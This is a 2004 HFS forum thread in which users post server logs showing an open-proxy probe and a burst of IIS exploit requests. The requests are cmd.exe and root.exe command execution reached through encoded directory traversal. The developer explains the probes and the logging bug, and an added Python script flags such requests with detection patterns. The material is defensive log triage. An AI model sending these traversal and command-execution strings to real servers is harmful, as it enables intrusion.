rejetto forum

Software => HFS ~ HTTP File Server => Topic started by: Chez on February 18, 2004, 04:14:02 PM

Title: Check this out...
Post by: Chez on February 18, 2004, 04:14:02 PM
Look what I found in my HFS log:

07:58:31  64.166.117.133:2702 Requested GEThttp://hpcgi1.nifty.com/trino/ProxyJ/prxjdg.cgi
07:58:31  64.166.117.133:2702 Fully downloaded


What the hell is this ?
Title: Check this out...
Post by: rejetto on February 18, 2004, 09:28:17 PM
someone requested that URL to your HFS.
i guess HFS replied with a 404 error, but older builds (current is rc13) had a bug showing "fully downloaded" in the log for errors too
Title: Check this out...
Post by: SAT on February 19, 2004, 03:11:36 AM
Hello Rejetto, can you tell me what this user was doing? & how can I tell what information he received?

2/18/2004 1:46:15 PM  24.59.78.218:3196 Connected
2/18/2004 1:46:15 PM  24.59.78.218:3196 Requested GET/scripts/root.exe?/c dir
2/18/2004 1:46:15 PM  24.59.78.218:3196 Fully downloaded
2/18/2004 1:46:16 PM  24.59.78.218:3298 Connected
2/18/2004 1:46:16 PM  24.59.78.218:3298 Requested GET/MSADC/root.exe?/c dir
2/18/2004 1:46:16 PM  24.59.78.218:3298 Fully downloaded
2/18/2004 1:46:17 PM  24.59.78.218:3347 Connected
2/18/2004 1:46:17 PM  24.59.78.218:3347 Requested GET/c/winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:17 PM  24.59.78.218:3347 Fully downloaded
2/18/2004 1:46:18 PM  24.59.78.218:3371 Connected
2/18/2004 1:46:18 PM  24.59.78.218:3371 Requested GET/d/winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:18 PM  24.59.78.218:3371 Fully downloaded
2/18/2004 1:46:19 PM  24.59.78.218:3393 Connected
2/18/2004 1:46:19 PM  24.59.78.218:3393 Requested GET/scripts/..%5c../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:19 PM  24.59.78.218:3393 Fully downloaded
2/18/2004 1:46:19 PM  24.59.78.218:3416 Connected
2/18/2004 1:46:20 PM  24.59.78.218:3416 Requested GET/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:20 PM  24.59.78.218:3416 Fully downloaded
2/18/2004 1:46:20 PM  24.59.78.218:3430 Connected
2/18/2004 1:46:20 PM  24.59.78.218:3430 Requested GET/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:20 PM  24.59.78.218:3430 Fully downloaded
2/18/2004 1:46:21 PM  24.59.78.218:3450 Connected
2/18/2004 1:46:21 PM  24.59.78.218:3450 Requested GET/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:21 PM  24.59.78.218:3450 Fully downloaded
2/18/2004 1:46:22 PM  24.59.78.218:3509 Connected
2/18/2004 1:46:22 PM  24.59.78.218:3509 Requested GET/scripts/..Á../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:22 PM  24.59.78.218:3509 Fully downloaded
2/18/2004 1:46:23 PM  24.59.78.218:3530 Connected
2/18/2004 1:46:23 PM  24.59.78.218:3530 Requested GET/scripts/..À/../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:23 PM  24.59.78.218:3530 Fully downloaded
2/18/2004 1:46:24 PM  24.59.78.218:3549 Connected
2/18/2004 1:46:24 PM  24.59.78.218:3549 Requested GET/scripts/..À¯../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:24 PM  24.59.78.218:3549 Fully downloaded
2/18/2004 1:46:25 PM  24.59.78.218:3574 Connected
2/18/2004 1:46:25 PM  24.59.78.218:3574 Requested GET/scripts/..Áœ../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:25 PM  24.59.78.218:3574 Fully downloaded
2/18/2004 1:46:29 PM  24.59.78.218:3590 Connected
2/18/2004 1:46:35 PM  24.59.78.218:3590 Requested GET/scripts/..%5c../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:35 PM  24.59.78.218:3590 Fully downloaded
2/18/2004 1:46:36 PM  24.59.78.218:3872 Connected
2/18/2004 1:46:36 PM  24.59.78.218:3872 Requested GET/scripts/..%5c../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:36 PM  24.59.78.218:3872 Fully downloaded
Title: Check this out...
Post by: rejetto on February 19, 2004, 03:41:42 AM
he's trying an exploit of IIS
but no IIS here  :roll:
he got nothing

as i already said, the "fully downloaded" is a bug in the log of your version
update to get rid of it
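
As an added example (not part of the thread and not HFS code), a small Python triage script over log lines like the ones posted above: it groups the proxy probe and the IIS-style requests by source IP and ignores the "Fully downloaded" status, which the reply above says is unreliable in these builds. The rule names and the 192.0.2.10 line are constructed for illustration.

```python
import re
from collections import defaultdict

# "Requested" lines in both timestamp styles shown above. The method is printed
# fused to the target ("GET/scripts/..."), so whitespace after it is optional.
REQ = re.compile(r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):\d+\s+Requested\s+"
                 r"(?P<method>GET|POST|HEAD)\s*(?P<target>\S.*)$")

# Rule names are this example's own labels, not HFS terminology.
RULES = [
    ("proxy-probe", re.compile(r"^https?://", re.I)),  # absolute URI sent to a file server
    ("iis-root-exe", re.compile(r"/root\.exe\?", re.I)),
    ("iis-cmd-exe", re.compile(r"/cmd\.exe\?", re.I)),
    # ".." followed by an encoded separator or by raw non-ASCII bytes
    ("encoded-traversal", re.compile(r"\.\.(?:%5c|%2f|%c[01]|[^\x00-\x7f])", re.I)),
]

def classify(line):
    """Return (ip, target, [rule names]) for a Requested line, else None."""
    m = REQ.search(line)
    if not m:
        return None  # Connected / Fully downloaded lines carry no request
    target = m.group("target").strip()
    return m.group("ip"), target, [n for n, rx in RULES if rx.search(target)]

def summarize(lines):
    """Map source IP -> {rule name: count} over all flagged requests."""
    report = defaultdict(lambda: defaultdict(int))
    for parsed in filter(None, map(classify, lines)):
        ip, _, hits = parsed
        for name in hits:
            report[ip][name] += 1
    return {ip: dict(counts) for ip, counts in report.items()}

# Lines copied from the posts above, plus one constructed benign request (last line).
SAMPLE = """\
07:58:31  64.166.117.133:2702 Requested GEThttp://hpcgi1.nifty.com/trino/ProxyJ/prxjdg.cgi
07:58:31  64.166.117.133:2702 Fully downloaded
2/18/2004 1:46:15 PM  24.59.78.218:3196 Requested GET/scripts/root.exe?/c dir
2/18/2004 1:46:17 PM  24.59.78.218:3347 Requested GET/c/winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:19 PM  24.59.78.218:3393 Requested GET/scripts/..%5c../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:19 PM  24.59.78.218:3393 Fully downloaded
2/18/2004 1:46:40 PM  192.0.2.10:4000 Requested GET/files/readme.txt
""".splitlines()

if __name__ == "__main__":
    for ip, counts in summarize(SAMPLE).items():
        print(ip, counts)
```

A per-IP count like this separates a scripted sweep (many rule hits within seconds from one address) from ordinary downloads, without relying on the response status the log prints.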
Title: Check this out...
Post by: SAT on February 19, 2004, 04:35:35 PM
Quote from: "rejetto"
he's trying an exploit of IIS
but no IIS here  :roll:
he got nothing

as i already said, the "fully downloaded" is a bug in the log of your version
update to get rid of it

Thanks for your reply sir. That is my ISP trying to see what I am sharing.
he's also looking for c: I am using F: :-)

I am running v1.6 rc11... I am having some trouble understanding how to automate creating log files daily, but otherwise am very grateful for your work. This is a kick-ass http server.
I didn't see any links for donations? I want to donate.
Title: Check this out...
Post by: Anonymous on February 19, 2004, 07:15:59 PM
Quote from: "SAT"
I didn't see any links for donations? I want to donate.

Look here - right bottom... :
http://www.rejetto.com/
Title: Check this out...
Post by: rejetto on February 19, 2004, 08:17:33 PM
daily log?
the log file is not locked most of the time, so you can use an external "rotation" software (i think apache has one)
Title: Check this out...
Post by: SAT on February 20, 2004, 02:57:10 PM
Quote from: "Anonymous"
Quote from: "SAT"
I didn't see any links for donations? I want to donate.

Look here - right bottom... :
http://www.rejetto.com/

I will "little bit each time...so I don't miss it"
Title: Check this out...
Post by: rejetto on February 20, 2004, 07:54:55 PM
thank you for the donation :)
really appreciated
i shall put the paypal button somewhere else